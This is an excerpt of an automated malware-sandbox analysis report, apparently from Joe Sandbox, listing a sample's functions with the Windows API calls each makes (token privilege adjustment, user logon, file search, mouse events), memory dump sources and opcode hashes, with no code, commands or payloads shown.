                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: a017d0c472f9eef7730f79a6ed81243727afb7689e77f81767e92bc75ede3074
                                                                                                                      • Instruction ID: ea4a3feb953de53a43ec424964c0158d9ab6c7f6feeb35f8632ef2b57db9777e
                                                                                                                      • Opcode Fuzzy Hash: a017d0c472f9eef7730f79a6ed81243727afb7689e77f81767e92bc75ede3074
                                                                                                                      • Instruction Fuzzy Hash: DD219239A00118EFCB00EF95D884EEDBBB8FF49314F1480AEE805AB351CB319959CB50
                                                                                                                      Function 005187E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
                                                                                                                        • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0051882B
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00518858
                                                                                                                      • GetLastError.KERNEL32 ref: 00518865
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1922334811-0
                                                                                                                      • Opcode ID: fccb4afbbd2903ea1dccb61d6a1e03b12838cc27564913d46a85d5460c8bd7ee
                                                                                                                      • Instruction ID: 7a34731fd9581413c739e3e82e71a728a6465dcd9f518c607560e3e79ff132b9
                                                                                                                      • Opcode Fuzzy Hash: fccb4afbbd2903ea1dccb61d6a1e03b12838cc27564913d46a85d5460c8bd7ee
                                                                                                                      • Instruction Fuzzy Hash: 9A1190B1404205AFE728DF55DC85D6BBBA8FB45315B10852EF45683201DB70BC408B60
                                                                                                                      Function 0051874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00518774
                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0051878B
                                                                                                                      • FreeSid.ADVAPI32(?), ref: 0051879B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429775523-0
                                                                                                                      • Opcode ID: a26a785aa37127c7abe0045551368c298abeb3d08e081b254ba16b6e39f22edc
                                                                                                                      • Instruction ID: 04a0fad1d736997b35833abecb7f4f59843aac6f24f645ef42a8483dad3e4f1f
                                                                                                                      • Opcode Fuzzy Hash: a26a785aa37127c7abe0045551368c298abeb3d08e081b254ba16b6e39f22edc
                                                                                                                      • Instruction Fuzzy Hash: AEF03C75911208BBDB00DFE49C89AEEBBB8EF08205F1044A9A506E2181D6715A489B50
                                                                                                                      Function 00528889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __time64.LIBCMT ref: 0052889B
                                                                                                                        • Part of subcall function 004E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00528F6E,00000000,?,?,?,?,0052911F,00000000,?), ref: 004E5213
                                                                                                                        • Part of subcall function 004E520A: __aulldiv.LIBCMT ref: 004E5233
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                      • String ID: 0eX
                                                                                                                      • API String ID: 2893107130-2786097830
                                                                                                                      • Opcode ID: 4cc0fb6abe095add3f19e60602d369d11797c6d9af6e430fb6db677655725d7d
                                                                                                                      • Instruction ID: 3ac65d23955048dbdb58852a22fa35ce9842fef8d76719f816e49b6217a7e957
                                                                                                                      • Opcode Fuzzy Hash: 4cc0fb6abe095add3f19e60602d369d11797c6d9af6e430fb6db677655725d7d
                                                                                                                      • Instruction Fuzzy Hash: A421B4326355208BC729CF65E841A62B7E1EFA5311F688E6CD5F5CB2C0CA34B905DB94
                                                                                                                      Function 0052C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0052C6FB
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052C72B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: 9c310aa8041a7384849ab79d86718581b61a90acb739ec216b88273a5e1e6097
                                                                                                                      • Instruction ID: fcb8d0e714a929a96075d21105267c29c94570731ad09fec3cfb5d821cba260e
                                                                                                                      • Opcode Fuzzy Hash: 9c310aa8041a7384849ab79d86718581b61a90acb739ec216b88273a5e1e6097
                                                                                                                      • Instruction Fuzzy Hash: 2B1182766106009FDB10EF29D849A6AFBE5FF85324F04851EF9A587291DB34AC05CB91
                                                                                                                      Function 0052A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00539468,?,0054FB84,?), ref: 0052A097
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00539468,?,0054FB84,?), ref: 0052A0A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: 9011280d16efd588a72922739baf798ae37e987c80c5c47b4ba96b3b42a97364
                                                                                                                      • Instruction ID: 144f45acf051ba7d24012ba7e65bfcc86a5837eea9f0776c31f43c26aba79c10
                                                                                                                      • Opcode Fuzzy Hash: 9011280d16efd588a72922739baf798ae37e987c80c5c47b4ba96b3b42a97364
                                                                                                                      • Instruction Fuzzy Hash: 79F0823910522DABDB219FA4DC48FEA776CBF09361F00826AF909D6191D6709944DBA1
                                                                                                                      Function 005181CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00518309), ref: 005181E0
                                                                                                                      • CloseHandle.KERNEL32(?,?,00518309), ref: 005181F2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: 16df5e21263656737c9986d20a9e72aa48aed0c7d01a59ab5fc022ca15775218
                                                                                                                      • Instruction ID: 54c740ad3d3c2b23b440c3a495a98c7a7d0827ad6706d045cbe3482383a2eda8
                                                                                                                      • Opcode Fuzzy Hash: 16df5e21263656737c9986d20a9e72aa48aed0c7d01a59ab5fc022ca15775218
                                                                                                                      • Instruction Fuzzy Hash: 0BE0E676010510AFE7252B65EC09DB77BE9EF04315714883DF46684470DB615CD1DB14
                                                                                                                      Function 004EA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,004E8D57,?,?,?,00000001), ref: 004EA15A
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004EA163
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: ee9dd34dc35528440dcc12e50256695b35c5424be287ad7e2734e15cc82e5933
                                                                                                                      • Instruction ID: fdb532cb1db8e05c17302287773394e68cc19f69fdb0df8f686c242c1eabcc01
                                                                                                                      • Opcode Fuzzy Hash: ee9dd34dc35528440dcc12e50256695b35c5424be287ad7e2734e15cc82e5933
                                                                                                                      • Instruction Fuzzy Hash: 26B09235054208ABCA002F99EC09FC83F68EB56AAAF404420F60D84060CB625454AB91
                                                                                                                      Function 004EF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fc2091cc1174aff9be6837b13608232af8e82fe79d6f669d4b61fde63bed3d05
                                                                                                                      • Instruction ID: 31caee5208f23f6a1793735abbec37905d6ecf289654cefb4a51538d3cb1c7a8
                                                                                                                      • Opcode Fuzzy Hash: fc2091cc1174aff9be6837b13608232af8e82fe79d6f669d4b61fde63bed3d05
                                                                                                                      • Instruction Fuzzy Hash: 65325422D29F454DD7239635D832336A288AFB73D6F15C737F81AB5AA6EB28C4C75100
                                                                                                                      Function 004F242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 60914b9e86bc6cc729c8a8764076f56fd3ee5f725a04018d84e27811c4360dda
                                                                                                                      • Instruction ID: e4613f271ee6964c381a7e163710d65c104a586dc76a50862cd6ebb4d09c50f2
                                                                                                                      • Opcode Fuzzy Hash: 60914b9e86bc6cc729c8a8764076f56fd3ee5f725a04018d84e27811c4360dda
                                                                                                                      • Instruction Fuzzy Hash: 90B10120E2AF414DD72396398831336BB5CAFBB2DAF52D71BFC2674D22EB2185875141
                                                                                                                      Function 00524C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00524C76
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: mouse_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2434400541-0
                                                                                                                      • Opcode ID: 4aff6d65de7b9abc503e1f289797f75929e699da2dfc79a759e0ba87e8d07430
                                                                                                                      • Instruction ID: 63ded8ba5eb91a75f56178def1605ceea02994fa8e9de88202f9962b746fffb5
                                                                                                                      • Opcode Fuzzy Hash: 4aff6d65de7b9abc503e1f289797f75929e699da2dfc79a759e0ba87e8d07430
                                                                                                                      • Instruction Fuzzy Hash: 34D05EF412223939EE280728BD4FFBA1909FBC3781F84854A7241A50C0E8E09C00AC34
                                                                                                                      Function 005187B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00518389), ref: 005187D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LogonUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1244722697-0
                                                                                                                      • Opcode ID: d3a24c673fa60dc59dd8668c654fa2c24a131c72b8ae38701b1f166e6f499723
                                                                                                                      • Instruction ID: 80a9809c24e1aeaed046ec37a6a8b41fbec38532bfcc1174e6c4a9ce1881f18b
                                                                                                                      • Opcode Fuzzy Hash: d3a24c673fa60dc59dd8668c654fa2c24a131c72b8ae38701b1f166e6f499723
                                                                                                                      • Instruction Fuzzy Hash: 65D05E3226050EABEF018EA8DC05EEF3B69EB04B01F408111FE16C50A1C775D835AB60
                                                                                                                      Function 004EA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004EA12A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 50642689c7bb80e1f3f1cd44c24b1ead039e97b4d951b70b1b19d425fa3f6aba
                                                                                                                      • Instruction ID: 4ba0961fea47214fb8ba1df9e529503da3fab4e27ffd95b44dcfc3bbd46e9af9
                                                                                                                      • Opcode Fuzzy Hash: 50642689c7bb80e1f3f1cd44c24b1ead039e97b4d951b70b1b19d425fa3f6aba
                                                                                                                      • Instruction Fuzzy Hash: F5A0123000010CA78A001F45EC048847F5CD6015947004020F40C40021873254105680
                                                                                                                      Function 004D8808 Relevance: .6, Instructions: 590COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1233dfd3823ff1aa1a855e69bbe255c76e73774195ccb5382a9bfe1a5318e397
                                                                                                                      • Instruction ID: 94b1e5f90735a63b5da001a4cd3bd70d9e1c51354bb748d0dd37d5353f964940
                                                                                                                      • Opcode Fuzzy Hash: 1233dfd3823ff1aa1a855e69bbe255c76e73774195ccb5382a9bfe1a5318e397
                                                                                                                      • Instruction Fuzzy Hash: 3B225730604106CBEF389B64C0B47BD7BA1FB81304F68846FD4968B792EB789EC1D646
                                                                                                                      Function 004E21C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction ID: 3d0e6c213e687ab9ba43d8103cd2284b93c944e31fe9a6eee3070adbd0d71f0e
                                                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction Fuzzy Hash: 64C173322050D30ADB2D473B893443FBAA55FA27B231A075FD8B3CB2D4EE68D965D614
                                                                                                                      Function 004E25FA Relevance: .3, Instructions: 341COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction ID: f20e1729f29a849329519bbc431ad2e2c0f4fa931855a8d30194b653da0f2ea1
                                                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction Fuzzy Hash: 0FC1B5322050D30ADB2D473B893443FBAA55FA27B231A076FD4B2DB2D4EE28D975D614
                                                                                                                      Function 004E1978 Relevance: .3, Instructions: 323COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
